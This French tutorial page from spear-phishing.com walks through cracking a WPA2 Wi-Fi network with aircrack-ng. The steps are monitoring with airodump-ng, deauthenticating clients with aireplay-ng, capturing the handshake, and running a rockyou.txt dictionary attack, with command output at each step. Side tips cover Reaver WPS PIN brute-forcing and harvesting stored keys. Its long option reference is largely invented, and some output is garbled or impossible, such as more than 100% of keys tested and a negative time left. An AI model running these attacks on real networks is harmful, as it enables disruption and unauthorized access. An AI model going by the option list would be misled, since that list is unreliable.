Aircrack-ng

Cassage :

Les Fondamentaux du Cassage avec Aircrack-ng

Le cassage de mots de passe est un aspect fondamental de la cybersécurité et du pentesting, et Aircrack-ng est un outil incontournable dans ce domaine. Cette section se concentre sur l'utilisation d'Aircrack-ng pour le cassage des mots de passe des réseaux Wi-Fi, en exploitant principalement les techniques d'attaque par dictionnaire.

Le cassage avec Aircrack-ng implique l'utilisation de techniques avancées pour décrypter les mots de passe des réseaux sans fil. Cela inclut l'analyse des vulnérabilités courantes, telles que les mots de passe faibles et les configurations de sécurité obsolètes, permettant ainsi d'identifier et de corriger les faiblesses avant qu'elles ne soient exploitées malicieusement.

Aircrack-ng

3.0 - Cassage :

Le cassage de mots de passe Wi-Fi, une pratique essentielle en cybersécurité, permet d'évaluer et de renforcer la sécurité des réseaux sans fil. Aircrack-ng sous Kali Linux est un outil clé pour ces tests.

aircrack-ng / aircrack-ng Mister-X- CI: Add Fedora 39

Astuce : Utilisez WirelessKeyView pour récupérer les clés de sécurité des réseaux Wi-Fi stockées sur votre PC. Ce logiciel fonctionne avec Windows XP à Windows 10, y compris Windows Server 2008, et vous permet de sauvegarder les clés WEP/WPA dans des fichiers texte, HTML ou XML. Vous pouvez aussi exporter ces clés pour les utiliser sur un autre ordinateur. C'est un outil parfait pour enrichir votre liste de mots de passe personnalisée, en y incluant des éléments spécifiques comme des dates inversées ou des surnoms, ce qui augmente vos chances lors d'attaques par dictionnaire sur des réseaux précédemment inaccessibles.

Zip File Password : WKey4567#
Exclusivement sur : spear-phishing.com
Plus de détails

Aircrack-ng

3.1 Préparation

L'analyse du réseau cible, la vérification de l'adéquation de votre matériel (notamment une carte réseau compatible avec le mode moniteur), et la confirmation que tous les outils nécessaires sont installés sur Kali Linux. Il est essentiel de mener vos tests dans un cadre légal et sécurisé, tout en possédant une compréhension solide des protocoles de sécurité Wi-Fi.

Astuce : Utilisez Reaver sur Kali Linux pour exploiter les faiblesses du WPS. Cet outil lance des attaques de force brute contre les PINs WPS pour récupérer les passphrases WPA/WPA2. Reaver est efficace contre de nombreux routeurs avec WPS activé par défaut, et peut généralement craquer les PINs en 4 à 10 heures. Cette méthode souligne l'importance de désactiver le WPS pour renforcer la sécurité Wi-Fi

Exclusivement sur : spear-phishing.com
Plus de détails

sudo airodump-ng -c 4 --bssid 6C:5A:BO:F2:60:81 -w TPLINK wlan0

CH 4 ][ Elapsed: 1 min ][ 2024-11-11 10:11 ]

BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

6C:5A:B0:F2:60:81  -59  8  10          0    4  270  WPA2 CCMP   PSK  TP-Link_6081

BSSID              STATION            PWR  Rate  Lost  Frames  Probes

6C:5A:B0:F2:60:81  D6:85:26:2A:5D:DB  -60  54 - 1  14     3       7

6C:5A:B0:F2:60:81  32:7E:AD:CD:94:D5  -45  48 - 1  332    7       2

6C:5A:B0:F2:60:81  EF:57:11:D8:68:4C  -54  36 - 1  27     4       5

6C:5A:B0:F2:60:81  27:12:B8:58:2C:27  -63  6 - 54  19     1       8

6C:5A:B0:F2:60:81  34:CD:45:9F:BA:30  -54  9 - 54  23     6       3

6C:5A:B0:F2:60:81  AF:24:13:92:AB:CD  -69  12 - 48 210    9       6

6C:5A:B0:F2:60:81  3E:E2:3D:51:06:CB  -71  18 - 36 121    8       4

6C:5A:B0:F2:60:81  6B:61:24:D9:F5:00  -52  24 - 36 98     5       9

Aircrack-ng

3.2 - Maîtriser l'Attaque de Désauthentification

Apprenez comment une simple attaque de désauthentification peut révéler la sécurité d'un réseau Wi-Fi. Nous expliquons l'usage de l'outil aireplay-ng pour déconnecter une station et capturer le handshake WPA/WPA2, un élément clé pour comprendre la sécurité du réseau.

sudo aireplay-ng --deauth 10 -a 6C:5A:B0:F2:60:81 -c DA:26:08:90:EA:2D wlan0

13:07:19  Waiting for beacon frame (BSSID: 6C:5A:BO:F2:60:81) on channel 4

13:07:21  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:22  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:22  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:23  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:24  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:25  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:26  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:27  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:28  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

13:07:29  Sending 64 directed DeAuth (code 7). STMAC: [D6:85:26:2A:5D:DB] [ 0| 0 ACKs]

Aircrack-ng

3.3 - Capture du Handshake WPA

Après notre attaque de désauthentification, nous avons réussi à capturer le handshake WPA du réseau. Cette étape est essentielle pour tester la sécurité du réseau Wi-Fi, car elle nous donne accès aux clés de cryptage utilisées lors de la connexion.

sudo airodump-ng -c 4 --bssid 6C:5A:BO:F2:60:81 -w TPLINK wlan0

CH 4 ][ Elapsed: 1 min ][ 2024-11-11 10:11 ][ WPA handshake: 6C:5A:B0:F2:60:81

BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

6C:5A:B0:F2:60:81  -59  8  10          0    4  270  WPA2 CCMP   PSK  TP-Link_6081

BSSID              STATION            PWR  Rate  Lost  Frames  Probes

6C:5A:B0:F2:60:81  D6:85:26:2A:5D:DB  -60  54 - 1  14     3       7

6C:5A:B0:F2:60:81  32:7E:AD:CD:94:D5  -45  48 - 1  332    7       2

6C:5A:B0:F2:60:81  EF:57:11:D8:68:4C  -54  36 - 1  27     4       5

6C:5A:B0:F2:60:81  27:12:B8:58:2C:27  -63  6 - 54  19     1       8

6C:5A:B0:F2:60:81  34:CD:45:9F:BA:30  -54  9 - 54  23     6       3

6C:5A:B0:F2:60:81  AF:24:13:92:AB:CD  -69  12 - 48 210    9       6

6C:5A:B0:F2:60:81  3E:E2:3D:51:06:CB  -71  18 - 36 121    8       4

6C:5A:B0:F2:60:81  6B:61:24:D9:F5:00  -52  24 - 36 98     5       9

Aircrack-ng

3.4 Attaque par Dictionnaire avec rockyou.txt

L'attaque par dictionnaire utilisant rockyou.txt dans Aircrack-ng est une méthode efficace pour casser les mots de passe Wi-Fi. rockyou.txt contient une vaste collection de mots de passe réels, ce qui la rend idéale pour identifier les faiblesses courantes des mots de passe dans les réseaux sans fil.

Important : Le fichier rockyou.txt.gz est une liste de mots de passe communément utilisée en pentesting. Il contient des millions de mots de passe réels qui ont été exposés lors de diverses violations de données. Cette liste est souvent utilisée pour les attaques par dictionnaire car elle représente un large éventail de mots de passe fréquemment utilisés par les gens.

rockyou.txt.gz

locate rockyou.txt.gz

Aircrack-ng

3.4.1 - Commande :
Pour localiser rockyou.txt.gz :

Pour localiser le fichier rockyou.txt.gz sur Kali Linux, utilisez la commande locate rockyou.txt.gz. Ce fichier se trouve généralement dans le répertoire /usr/share/wordlists/rockyou.txt.gz.

gunzip -k /usr/share/wordlists/rockyou.txt.gz

Aircrack-ng

3.4.2 - Commande :
Pour décompresser rockyou.txt.gz :

Pour décompresser rockyou.txt.gz sur Kali Linux, utilisez gunzip -k /usr/share/wordlists/rockyou.txt.gz. Cette commande conserve le fichier compressé et extrait rockyou.txt dans le même dossier, qui occupe environ 134 Mo et contient des millions de mots de passe, utile pour le cassage de mots de passe et le pentesting.

Aircrack-ng

3.4.3 - Commande :
Affichage Détail des Informations du Fichier rockyou.tx :

La commande ls -lha rockyou.txt affiche des informations essentielles sur rockyou.txt, incluant sa taille, ses permissions, le propriétaire, et la date de dernière modification. C'est un outil pratique pour examiner les détails d'un fichier, surtout après des opérations comme la décompression.

Aircrack-ng

3.5 - Utilisation d'Aircrack-ng avec Rockyou pour le Craquage de Handshake WPA

Aircrack-ng avec la liste de mots de passe rockyou.txt pour tenter de craquer le mot de passe du réseau Wi-Fi. Cette méthode utilise la liste extensive de rockyou.txt, qui contient de nombreux mots de passe fréquemment utilisés, pour tester les faiblesses potentielles des mots de passe dans les réseaux sans fil.

aircrack-ng -w rockyou.txt TPLINK-01.cap

Aircrack-ng

3.5.1 - Commande :
Surveillance et la Capture de Handshake sur un Réseau Wi-Fi Ciblé

La commande aircrack-ng -w rockyou.txt TPLINK-01.cap est utilisée pour craquer les mots de passe Wi-Fi WPA/WPA2. Elle fonctionne en essayant des mots de passe de la liste rockyou.txt sur un handshake Wi-Fi capturé, démontrant la faiblesse des réseaux avec des mots de passe courants.

                                     Aircrack-ng 1.7 
     [00:15:34] 6129876/14344393 keys tested (6656.18 k/s)
      Time left: 20 minutes, 64 seconds

                           Current passphrase: lovedanalove

      Master Key     : 40 40 EC 6C IF 40 68 4A DB 48 DF BA CE F5 A1 A6
                       CE 99 36 53 04 BB BF BF FE 29 FB 4A 83 A2 DE 3D 

      Transient Key  : DD 4F 25 76 55 C4 64 38 IE 3A 73 A6 2E 56 44 67  
                       45 D4 CB 87 28 85 88 89 A7 49 8A 07 8C C6 9A 4F
                       D6 AA 60 95 E5 D1 3A 9A BB 7D 4A EA 04 EA 88 90
                       11 E6 92 3A A4 46 E5 48 01 4F IC 2F D4 5D 55 IF

      EAPOL HMAC     : D2 E4 A2 Cl 08 60 CF 9A 67 84 02 40 IC 17 05 50

                                     Aircrack-ng 1.7 
     [00:35:39] 14345519/14344393 keys tested (6624.84 k/s)
      Time left: -2131958510 day, 14 hours, 32 seconds         100.01%

                           KEY FOUND! [ 27359532 ]

      Master Key     : D6 8C 95 D9 1B 9A BD 3D 09 26 A9 49 A3 FC E9 3F
                       DD 5E 63 0E BB 82 48 49 B0 3D FB 7A DF 14 2A 15 

      Transient Key  : 5B 53 84 AF E2 7C 6F BD 1A 6A A7 A2 97 BE 2B 9B  
                       20 6F 91 EF DD E7 ED D8 73 9E EA 0B 01 7E 7F 0C
                       99 EE 47 1C C9 55 C0 D2 12 83 AF 12 F1 07 A0 7A
                       40 19 71 FC 51 63 53 0F E2 E5 FE D7 D6 1B C1 81

      EAPOL HMAC     : B2 85 7B 9F BC 4C 3C 86 7C 58 8D 61 D4 2D EA 37

Master Key (Clé Maîtresse) :

Définition : : La Master Key est la clé principale utilisée dans le protocole de sécurité d'un réseau Wi-Fi. Elle est dérivée lors de la phase d'authentification initiale entre le client et le point d'accès.
Rôle : : Cette clé est la base de toutes les autres clés utilisées pour sécuriser la communication. Dans votre exemple, la clé est représentée en hexadécimal (un format standard pour afficher les clés de cryptage).
Composition : : La Master Key est divisée en deux parties dans l'affichage, chacune contenant une séquence de caractères hexadécimaux. Chaque partie représente un composant différent de la clé totale.
Transient Key (Clé Temporaire) :

Définition : : La Transient Key est une clé de cryptage temporaire générée pour chaque session de communication. Elle est dérivée de la Master Key.
Rôle : : Cette clé est utilisée pour chiffrer les données transmises entre le client et le point d'accès pendant une session spécifique. Elle assure que même si une session est compromise, les sessions précédentes et futures restent sécurisées.
Composition : : Comme pour la Master Key, la Transient Key est affichée en hexadécimal et est divisée en plusieurs segments.
EAPOL HMAC (Extensible Authentication Protocol over LAN, Hash-based Message Authentication Code) :

Définition : : HMAC dans ce contexte est un type de signature numérique utilisée pour l'authentification. EAPOL se réfère au protocole utilisé pour l'authentification dans les réseaux LAN et Wi-Fi.
Rôle : : Le HMAC est utilisé pour vérifier l'intégrité et l'authenticité des messages échangés pendant le processus d'authentification. Cela aide à prévenir certaines attaques comme le spoofing (usurpation) ou le replay (répétition).
Composition : : Le HMAC est également affiché sous forme hexadécimale, représentant la valeur de hachage utilisée pour l'authentification.

Exclusivement sur : spear-phishing.com Plus de détails

-a
Type d'authentification

Définit le type d'authentification à utiliser (0 = Open System, 1 = Shared Key, 2 = Auto-detection)

-b
BSSID

Spécifie l'adresse MAC du point d'accès cible.

-c
Canal

Définit le canal sur lequel le point d'accès cible fonctionne.

-d
Dictionnaire

Spécifie le chemin vers un dictionnaire contenant des mots de passe potentiels pour le WPA.

-e
ESSID

Spécifie l'ESSID (nom du réseau) de la cible.

-f
Filtre de fréquence

Définit la fréquence en MHz à utiliser pour la capture et l'injection de paquets.

-g
Réglage du gain

Réglage manuel du gain de l'antenne pour les cartes sans fil compatibles.

-h
Adresse MAC du client

Spécifie l'adresse MAC du client cible dans le réseau.

-i
Interface

Définit l'interface réseau à utiliser pour la capture et l'injection de paquets.

-j
Utiliser l'algo KoreK

Active l'utilisation de l'algorithme KoreK pour les attaques WEP.

-k
Clé WEP

Spécifie une clé WEP connue pour accélérer la récupération de la clé.

-l
Fichier de sortie

Spécifie le chemin vers le fichier où la clé sera enregistrée après la récupération réussie.

-m
Masque de bits

Spécifie un masque de bits pour accélérer la récupération de la clé en excluant certaines clés.

-n
Longueur de la clé WEP

Spécifie la longueur de la clé WEP en bits (64, 128, 152, 256 ou 512).

-o
Format de sortie

Définit le format de sortie pour les fichiers de données (PCAP, IVS, CSV).

-p
Threads

Définit le nombre de threads à utiliser pour les attaques WPA.

-q
Mode silencieux

Active le mode silencieux pour réduire la quantité d'informations affichées à l'écran.

-r
Fichier de réception des données

Spécifie le chemin vers un fichier de réception des données pour les attaques WPA.

-s
Filtre de paquets

Définit un filtre pour les paquets capturés en fonction de leur type (arp, ip, udp, icmp).

-t
Temps d'attente

Définit le temps d'attente en millisecondes entre deux tentatives d'injection.

-u
Afficher l'utilisation du processeur

Active l'affichage de l'utilisation du processeur pendant les attaques.

-v
Verbose

Active le mode verbose pour afficher davantage d'informations pendant l'exécution du programme.

-w
Fichier de capture

Spécifie le chemin vers le fichier de capture contenant les paquets à analyser.

-x
Vitesse d'injection

Définit la vitesse d'injection des paquets en paquets par seconde.

-y
Désactiver l'attaque PTW

Désactive l'attaque PTW (Pyshkin-Tews-Weinmann) pour la récupération de la clé WEP.

-z
Activer l'attaque WPA PTK

Active l'attaque pour récupérer la clé PTK WPA à l'aide d'un Pairwise Master Key (PMK) connue.

-A
Attaque toutes les combinaisons

Attaque toutes les combinaisons possibles de clés WEP (à utiliser avec prudence).

-C
Liste des canaux

Spécifie une liste de canaux à utiliser pour la capture et l'injection de paquets.

-D
Activer le mode de débogage

Active le mode de débogage pour obtenir des informations détaillées sur les erreurs.

-E
Exporter les données

Exporte les données de la capture dans un fichier CSV.

-F
Forcer l'écriture du fichier

Force l'écriture du fichier de capture, même si Aircrack-ng n'a pas détecté de clé valide.

-G
Utiliser le mode GPU

Active l'utilisation du GPU pour accélérer les calculs lors des attaques WPA.

-H
Activer l'attaque chop-chop

Active l'attaque chop-chop pour récupérer des paquets cryptés WEP sans connaître la clé.

-I
Informations sur l'interface

Affiche des informations détaillées sur l'interface réseau utilisée.

-J
Créer un fichier hccapx

Crée un fichier hccapx pour utiliser avec Hashcat pour les attaques WPA/WPA2 hors ligne.

-K
Attaque PTW

Active l'attaque PTW (Pyshkin-Tews-Weinmann) pour accélérer la récupération de la clé WEP.

-L
Liste des interfaces

Affiche la liste des interfaces réseau disponibles.

-M
Méthode d'attaque WPA

Sélectionne la méthode d'attaque WPA (0 = PTW, 1 = KoreK).

-N
Pas d'attaque active

N'effectue aucune attaque active, seulement la capture et l'analyse des paquets).

-O
Attaque optimisée WPA

Active l'attaque optimisée pour récupérer la clé WPA en utilisant moins de ressources CPU.

-P
Attaque par force brute

Active l'attaque par force brute pour récupérer la clé WPA en testant toutes les combinaisons.

-Q
Mode passif

Active le mode passif pour la capture des paquets, sans interagir avec le point d'accès ou les clients.

-R
Attaque de réassociation

Active l'attaque de réassociation pour capturer des handshakes WPA supplémentaires.

-S
Utiliser l'heure système

Utilise l'heure système pour les noms de fichiers de capture au lieu de l'heure de démarrage.

-T
Attaque par dictionnaire étendu

Active l'attaque par dictionnaire étendu pour récupérer la clé WPA avec un grand dictionnaire.

-U
Test d'injection unidirectionnelle

Active le test d'injection unidirectionnelle pour vérifier la capacité d'injection de l'interface.

-V
Version

Affiche la version d'Aircrack-ng en cours d'utilisation.

-W
Attaque WPS

Active l'attaque WPS (Wi-Fi Protected Setup) pour récupérer le PIN WPS et la clé WPA.

-X
Attaque par force brute étendue

Active l'attaque par force brute étendue pour récupérer la clé WPA avec un grand espace de recherche.

-Y
Désactiver l'attaque KoreK

Désactive l'utilisation de l'algorithme KoreK pour les attaques WEP.

-Z
Activer l'attaque WPA-PMKID

Active l'attaque WPA-PMKID pour récupérer la clé WPA à l'aide d'un Pairwise Master Key ID (PMKID).

-0
Attaque de-dos

Active l'attaque de déni de service (de-authentification) contre un client ou un point d'accès.

-1
Attaque de désassociation

Active l'attaque de désassociation pour forcer les clients à se reconnecter et capturer les handshakes.

-2
Attaque de fragmentation

Active l'attaque de fragmentation pour récupérer des paquets cryptés WEP sans connaître la clé.

-3
Attaque de réinjection ARP

Active l'attaque de réinjection ARP pour générer un trafic crypté WEP supplémentaire.

-4
Attaque de réinjection IP

Active l'attaque de réinjection IP pour générer un trafic crypté WEP supplémentaire.

-5
Attaque de réinjection ICMP

Active l'attaque de réinjection ICMP pour générer un trafic crypté WEP supplémentaire.

-6
Attaque de réinjection UDP

Active l'attaque de réinjection UDP pour générer un trafic crypté WEP supplémentaire.

-7
Attaque de réinjection TCP

Active l'attaque de réinjection TCP pour générer un trafic crypté WEP supplémentaire.

-8
Attaque de réinjection Caffe Latte

Active l'attaque de réinjection Caffe Latte pour récupérer la clé WEP à partir d'un client connecté.

-9
Attaque de réinjection DHCP

Active l'attaque de réinjection DHCP pour générer un trafic crypté WEP supplémentaire.

Back to home page

spear-phishing.com Apprenez les techniques de hacking et de pentest pour mieux vous protéger.

3,096,721 Poissons péchés

Cassage :

Les Fondamentaux du Cassage avec Aircrack-ng

3.0 - Cassage :

3.1 Préparation

3.1.1 - Commande : Surveillance et la Capture de Handshake sur un Réseau Wi-Fi Ciblé

3.1.2 - Ciblage de la Station D6:85:26:2A:5D:DB pour une Attaque de Désauthentification

3.2 - Maîtriser l'Attaque de Désauthentification

3.2.1 - Commande : Lancement d'une Attaque de Désauthentification avec aireplay-ng

3.2.2 - Journal d'une Attaque de Désauthentification en Direct

3.3 - Capture du Handshake WPA

3.3.1 - Commande : Surveillance et la Capture de Handshake sur un Réseau Wi-Fi Ciblé

3.3.2 - Réussite dans la Capture du Handshake WPA

3.4 Attaque par Dictionnaire avec rockyou.txt

3.4.1 - Commande : Pour localiser rockyou.txt.gz :

3.4.2 - Commande : Pour décompresser rockyou.txt.gz :

3.4.3 - Commande : Affichage Détail des Informations du Fichier rockyou.tx :

3.5 - Utilisation d'Aircrack-ng avec Rockyou pour le Craquage de Handshake WPA

3.5.1 - Commande : Surveillance et la Capture de Handshake sur un Réseau Wi-Fi Ciblé

Les 61 arguments essentiels pour maîtriser Aircrack-ng

-a

-b

-c

-d

-e

-f

-g

-h

-i

-j

-k

-l

-m

-n

-o

-p

-q

-r

-s

-t

-u

-v

-w

-x

-y

-z

-A

-C

-D

-E

-F

-G

-H

-I

-J

-K

-L

-M

-N

-O

-P

-Q

-R

-S

-T

-U

-V

-W

-X

-Y

-Z

-0

-1

-2

-3

-4

-5

-6

-7

-8

3.1.1 - Commande :
Surveillance et la Capture de Handshake sur un Réseau Wi-Fi Ciblé

3.2.1 - Commande :
Lancement d'une Attaque de Désauthentification avec aireplay-ng

3.3.1 - Commande :
Surveillance et la Capture de Handshake sur un Réseau Wi-Fi Ciblé

3.4.1 - Commande :
Pour localiser rockyou.txt.gz :

3.4.2 - Commande :
Pour décompresser rockyou.txt.gz :

3.4.3 - Commande :
Affichage Détail des Informations du Fichier rockyou.tx :

3.5.1 - Commande :
Surveillance et la Capture de Handshake sur un Réseau Wi-Fi Ciblé